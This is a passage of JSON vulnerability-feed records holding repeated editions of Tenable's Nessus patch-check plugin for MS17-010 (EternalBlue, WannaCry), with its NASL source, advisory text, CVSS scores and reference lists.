script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-010';\nkbs = make_list(\n \"4012212\",\n \"4012213\",\n \"4012214\",\n \"4012215\",\n \"4012216\",\n \"4012217\",\n \"4012606\",\n \"4013198\",\n \"4013429\",\n \"4012598\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2',vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n ##############\n ## MAY 2017 ##\n ##############\n\n # Windows XP SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x64\") ||\n # Windows XP SP3\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7208\", min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", 
bulletin:bulletin, kb:\"4012598\", arch:\"x86\") ||\n # Windows Server 2003 SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n # Windows 8\n (\n (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname && \"2012\" >!< productname)\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\")\n )\n ||\n \n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\")\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22137\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\") ||\n\n ##############\n ## MAR 2017 ##\n ##############\n\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.19743\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.24067\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n\n # Windows 7 / Windows Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012212, 4012215)) ||\n\n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012214, 4012217))\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, 
rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012213, 4012216)) ||\n\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||\n\n # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||\n\n # Windows 10 1607 / Windows Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013429))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2020-06-01T04:18:42", "differentElements": ["cvss2", "cvss3", "modified"], "edition": 4}, {"bulletin": {"id": "SMB_NT_MS17-010.NASL", "hash": "7a18d253a708b29131db1c7e6adf1a49cc2a121960f07ebb5346d89ff0905f53", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)", "description": "The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. 
(CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.", "published": "2017-03-15T00:00:00", "modified": "2021-07-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://www.tenable.com/plugins/nessus/97737", "reporter": "This script is 
Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?d9f569cf", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?065561d0"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0199", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-07-29T03:47:18", "history": [], "viewCount": 2951, "enchantments": {"dependencies": {"modified": "2021-07-29T03:47:18", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["SSV:92952", "SSV:92935", "SSV:92964"], "type": "seebug"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": 
["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:F48CAEEE-E809-405D-B7AD-48D94140C67D"], "type": "attackerkb"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["MYHACK58:62201786371", "MYHACK58:62201785243", "MYHACK58:62201785189", "MYHACK58:62201785331", "MYHACK58:62201785268", "MYHACK58:62201786816", "MYHACK58:62201786827"], "type": "myhack58"}, {"idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["FIREEYE:ABF21A18BEF0ABDDD461684446C0A772", "FIREEYE:37C92D78C4F9986624FA2FB49CBCB764", "FIREEYE:8CFA7797EC0BA31DD1AD30C4C7EE1BED", "FIREEYE:E77EEC61CF4FE2F4BDB43A5A0C15A644"], "type": "fireeye"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", 
"OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0199", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["MS17-010.NASL"], "type": "nessus"}, {"idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2021-07-29T03:47:18", "rev": 2, "value": 7.6, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "97737", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97737);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n script_xref(name:\"IAVA\", 
value:\"2017-A-0065\");\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)\");\n script_summary(english:\"Checks the version of the SYS files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. 
Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. 
Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-010';\nkbs = make_list(\n \"4012212\",\n \"4012213\",\n \"4012214\",\n \"4012215\",\n \"4012216\",\n \"4012217\",\n \"4012606\",\n \"4013198\",\n \"4013429\",\n \"4012598\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2',vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n ##############\n ## MAY 2017 ##\n ##############\n\n # Windows XP SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x64\") ||\n # Windows XP SP3\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7208\", min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", 
bulletin:bulletin, kb:\"4012598\", arch:\"x86\") ||\n # Windows Server 2003 SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n # Windows 8\n (\n (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname && \"2012\" >!< productname)\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\")\n )\n ||\n \n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\")\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22137\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\") ||\n\n ##############\n ## MAR 2017 ##\n ##############\n\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.19743\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.24067\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n\n # Windows 7 / Windows Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012212, 4012215)) ||\n\n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012214, 4012217))\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, 
rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012213, 4012216)) ||\n\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||\n\n # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||\n\n # Windows 10 1607 / Windows Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013429))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-07-29T03:47:18", "differentElements": ["modified"], "edition": 5}, {"bulletin": {"id": "SMB_NT_MS17-010.NASL", "hash": "9007212104ab51ff65ae1aa2c5a04493", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)", "description": "The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. 
(CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.", "published": "2017-03-15T00:00:00", "modified": "2021-08-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", 